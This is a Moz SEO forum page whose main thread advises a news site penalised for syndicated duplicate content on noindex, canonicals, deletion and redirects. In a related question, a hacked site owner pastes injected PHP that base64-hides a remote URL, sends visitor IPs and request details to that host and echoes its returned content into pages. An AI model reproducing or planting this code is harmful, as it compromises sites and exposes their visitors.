Removing duplicated content using only the NOINDEX in large scale (80% of the website).
-
Hi everyone,
I am taking care of the large "news" website (500k pages), which got massive hit from Panda because of the duplicated content (70% was syndicated content). I recommended that all syndicated content should be removed and the website should focus on original, high quallity content.
However, this was implemented only partially. All syndicated content is set to NOINDEX (they thing that it is good for user to see standard news + original HQ content). Of course it didn't help at all. No change after months. If I would be Google, I would definitely penalize website that has 80% of the content set to NOINDEX a it is duplicated. I would consider this site "cheating" and not worthy for the user.
What do you think about this "theory"? What would you do?
Thank you for your help!
-
-
it has been almost a year now from the massive hit. after that, there were also some smaller hits
-
we are putting effort into improvements. that is quite frustrating for me, because I believe that our effort is demolished by old duplicated content (that creates 80% of the website :-))
Yeah, we will need to take care about the link-mess...
Thank you! -
-
Yeah, this strategy will be definitely part of the guidelines for the editors.
One last question: do you know some good resources I can use as an inspiration?
Thank you so much..
-
We deleted thousands of pages every few months.
Before deleting anything we identified valuable pages that continued to receive traffic from other websites or from search. These were often updated and kept on the site. Everything else was 301 redirected to the "news homepage" of the site. This was not a news site, it was a very active news section on an industry portal site.
You have set 410 for those pages and remove all internal links to them and google was ok with that?
Our goal was to avoid internal links to pages that were going to be deleted. Our internal "story recommendation" widgets would stop showing links to pages after a certain length of time. Our periodic purges were done after that length of time.
We never used hard coded links in stories to pages that were subject to being abandoned. Instead we simply linked to category pages where something relevant would always be found.
Develop a strategy for internal linking that will reduce site maintenance and focus all internal links to pages that are permanently maintained.
-
Yaikes! Will you guys still pay for it if it's removed? If so, then combining below comments with my thoughts - I'd delete it, since it's old and not time relevant.
-
Yeah, paying ... we actually pay for this content (earlier management decisions :-))
-
EGOL your insights are very appreciated :-)!
I agree with you. Makes total sense.
So you didn't experience any problems removing outdated content (or "content with no traffic value") from your website? You have set 410 for those pages and remove all internal links to them and google was ok with that?
Redirecting useless content - you mean set 301 to the most relevant page that is bringing traffic?
Thank you sir
-
But I still miss the point of paying for the content that is not accessible from SE
- "paying"?
Is my understanding right, that if I would set canonical for these duplicates, Google has no reason to show this pages in the SERP?
- correct
-
HI Dimitrii,
thank you very much for your opinion. The idea of canonical links is very interesting. We may try that in the "first" phase. But I still miss the point of paying for the content that is not accessible from SE.
Is my understanding right, that if I would set canonical for these duplicates, Google has no reason to show this pages in the SERP?
-
Just seeing the other responses. Agree with what EGOL mentions. A content audit would be even better to see if there was any value at all on those pages (GA traffic, links, etc). Odds are though that there was not any and you already killed all of it with the noindex tag in place.
-
Couple of things here.
-
If a second Panda update has not occurred since the changes that were made then you may not get credit for the noindexed content. I don't think this is "cheating" as with the noindex, it just told Google to take 350K of its pages out of the index. The noindex is one of the best ways to get your content out of Google's index.
-
If you have not spent time improving the non-syndicated content then you are missing the more important part and that is to improve the quality of the content that you have.
A side point to consider here, is your crawl budget. I am assuming that the site still internally links to these 350K pages and so users and bots will go to them and have to process etc. This is mostly a waste of time. As all of these pages are out of Google's index thanks to the noindex tag, why not take out all internal links to those pages (i.e. from sitemaps, paginated index pages, menus, internal content) so that you can have the user and Google focus on the quality content that is left over. I would then also 404/410 all those low quality pages as they are now out of Google's index and not linked internally. Why maintain the content?
-
-
Good point! News gotta be new
-
If there are 500,000 pages of "news" then a lot of that content is "history" instead of "news". Visitors are probably not consuming it. People are probably not searching for it. And actively visited pages on the site are probably not linking to it.
So, I would use analytics to determine if these "history" pages are being viewed, are pulling in much traffic, have very many links, and I would delete and redirect them if they are not important to the site any longer. This decision is best made at the page level.
For "unique content" pages that appear only on my site, I would assess them at regular intervals to determine which ones are pulling in traffic and which ones are not. Some sites place news in folders according to their publication dates and that facilitates inspecting old content for its continued value. These pages can then be abandoned and redirected once their content is stale and not being consumed. Again, this can best be done at the page level.
I used to manage a news section and every few months we would assess, delete and redirect, to keep the weight of the site as low as possible for maximum competitiveness.
-
Hi there.
NOINDEX !== no crawling. and surely it doesn't equal NOFOLLOW. what you probably should be looking at is canonical links.
My understanding is (and i can be completely wrong) that when you get hit by Panda for duplicate content and then try to recover, Google checks your website for the same duplicate content - it's still crawlable, all the links are still "followable", it's still scraped content, you aren't telling crawlers that you took it from somewhere else (by canonicalizing), it's just not displayed in SERPs. And yes, 80% of content being noindex probably doesn't help either.
So, I think that what you need to do is either remove that duplicate content whatsoever, or use canonical links to originals or (bad idea, but would work) block all those links in robots.txt (at least this way those pages will become uncrawlable whatsoever). All this still is unreputable techniques though, kinda like polishing the dirt.
Hope this makes sense.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Competitor is interlinking between his websites
I have a competitor who ranks in the first page for all his keywords and i found out in open site explorer that he has been interlinking between websites and it is obvious because he owns the same domain but different countries. for example, www.example.id (indonesia) www.example.my (malaysia) www.example.sg (singapore) (asian countries domain) my question here is this even consider "white hat"? I read one of the blog post from moz and here is the quote "#7 - Uniqueness of Source + Target The engines have a number of ways to judge and predict ownership and relationships between websites. These can include (but are certainly not limited to): A large number of shared, reciprocated links
White Hat / Black Hat SEO | | andzon
Domain registration data
Shared hosting IP address or IP address C-blocks
Public acquisition/relationship information
Publicized marketing agreements that can be machine-read and interpreted If the engines determine that a pre-existing relationship of some kind could inhibit the "editorial" quality of a link passing between two sites, they may choose to discount or even ignore these. Anecdotal evidence that links shared between "networks" of websites pass little value (particularly the classic SEO strategy of "sitewide" links) is one point many in the organic search field point to on this topic." will interlinking between your sites will be ignored by google in the future? is this a time bomb method or it is fine doing so? Because as far as concern my competitor is actually ranking on the first page for quite some time.1 -
Is it okay to use eLocal services?
Is it okay to use a service like eLocal's 'reach the web' to clean up our company listings on website directories or is it considered black hat? Our company name and address is inconsistent on many of the website directories and we want to clean it up fast. eLocal has a service that can do this. I just want to make sure it's not considered bad to have a vendor do it. Thanks!
White Hat / Black Hat SEO | | KristyFord0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Is it still valuable to place content in subdirectories to represent hierarchy or is it better to have every URL off the root?
Is it still valuable to place content in subdirectories to represent hierarchy on the site or is it better to have every URL off the root? I have seen websites structured both ways. It seems having everything off the root would dilute the value associated with pages closest to the homepage. Also, from a user perspective, I see the value in a visual hierarchy in the URL.
White Hat / Black Hat SEO | | belcaro19860 -
Footer Link in International Parent Company Websites Causing Penalty?
Still waiting to look at the analytics for the timeframe, but we do know that the top keyword dropped on or about April 23, 2012 from the #1 ranking in Google - something they had held for years, and traffic dropped over 15% that month and further slips since. Just looked at Google Webmaster Tools and see over 2.3MM backlinks from "sister" compainies from their footers. One has over 700,000, the rest about 50,000 on average and all going to the home page, and all using the same anchor text, which is both a branded keyword, as well as a generic keyword, the same one they ranked #1 for. They are all "nofollows" but we are trying to confirm if the nofollow was before or after they got hit, but regardless, Google has found them. To also add, most of sites are from their international sites, so .de, .pl, .es, .nl and other Eurpean country extensions. Of course based on this, I would assume the footer links and timing, was result of the Penguin update and spam. The one issue, is that the other US "sister" companies listed in the same footer, did not see a drop, in fact some had increase traffic. And one of them has the same issue with the brand name, where it is both a brand name and a generic keyword. The only note that I will make about any of the other domains is that they do not drive the traffic this one used to. There is at least a 100,000+ visitor difference among the main site, and this additional sister sites also listed in the footer. I think I'm on the right track with the footer links, even though the other sites that have the same footer links do not seem to be suffering as much, but wanted to see if anyone else had a different opinion or theory. Thanks!
White Hat / Black Hat SEO | | LeverSEO
Jen Davis0 -
Can you have too many NOINDEX meta tags?
Hi, Our magento store has a lot of duplicate content issues - after trying various configurations with canonicals, robots, we decided it best and easier to manage to implement Meta NOINDEX tags to the pages that we wish the search engines to ignore. There are about 10000 URL's in our site that can be crawled - 6000 are Meta No Index - and 3000 odd are index follow. There is a high proportion of Meta No Index tags - can that harm our SEO efforts? thanks, Ben
White Hat / Black Hat SEO | | bjs20100 -
Removing a sitewide backlink without damaging the domain
Hello, I have a client that partnered up with a person in his field 4 years ago and got him to place a sitewide link to his site, high domain authority. Now with recent developments this site owner wants to take off these links so that they won't leak pagerank. The person insists in taking all the links off with his next website redesign. I have found several years ago in my own SEO efforts that removal of a sitewide link actually damages the domain. Is this still true? Should he ask for a nofollow or will that change damage our domain as well? Is there any way he can not take a huge hit on this? He doesn't mind the loss of links, he just don't want to be damaged. Please only post if you have recent experience with sitewide link removal, or if you have something related or a solution.
White Hat / Black Hat SEO | | BobGW0